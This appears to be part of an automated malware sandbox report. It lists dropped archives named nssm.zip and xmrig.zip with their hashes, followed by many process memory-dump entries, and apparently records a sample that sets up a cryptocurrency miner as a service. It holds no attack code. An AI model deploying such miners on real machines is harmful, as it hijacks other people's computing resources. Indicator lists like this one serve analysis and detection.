C:\Users\Admin\nssm.zip
Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip
Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/508-90-0x000001D92C1E0000-0x000001D92C1EA000-memory.dmp

Filesize
40KB

Download
memory/508-91-0x000001D92C210000-0x000001D92C222000-memory.dmp

Filesize
72KB

Download
memory/1288-134-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/1288-135-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-432-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-434-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-438-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-437-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-436-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-435-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-433-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-425-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-426-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-427-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-428-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-429-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-430-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2600-431-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/3620-2-0x00007FFB1C1D3000-0x00007FFB1C1D4000-memory.dmp

Filesize
4KB

Download
memory/3620-424-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download
memory/3620-26-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download
memory/3620-5-0x000001B9CCED0000-0x000001B9CCEF2000-memory.dmp

Filesize
136KB

Download
memory/3620-8-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download
memory/3620-9-0x000001B9CD100000-0x000001B9CD176000-memory.dmp

Filesize
472KB

Download
memory/3620-18-0x00007FFB1C1D0000-0x00007FFB1CBBC000-memory.dmp

Filesize
9.9MB

Download